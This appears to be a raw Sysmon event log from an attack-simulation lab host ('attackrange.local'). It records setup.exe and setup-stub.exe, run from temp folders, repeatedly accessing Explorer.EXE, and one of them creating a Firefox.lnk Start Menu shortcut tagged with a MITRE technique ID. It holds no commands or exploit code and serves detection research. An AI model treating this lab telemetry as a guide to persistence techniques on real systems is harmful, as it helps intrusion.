13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64) 10341000x800000000000000016355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+12c7(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ShellLink.dll+15ac(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 11241100x800000000000000016354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10232021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk2021-01-18 13:59:53.380 10341000x800000000000000016353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7ee(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+9b7de(wow64)|C:\Windows\System32\windows.storage.dll+9b66b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+2228|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 11241100x800000000000000016345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10232021-01-18 13:59:53.380{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk2021-01-18 13:59:53.380 10341000x800000000000000016344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.364{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
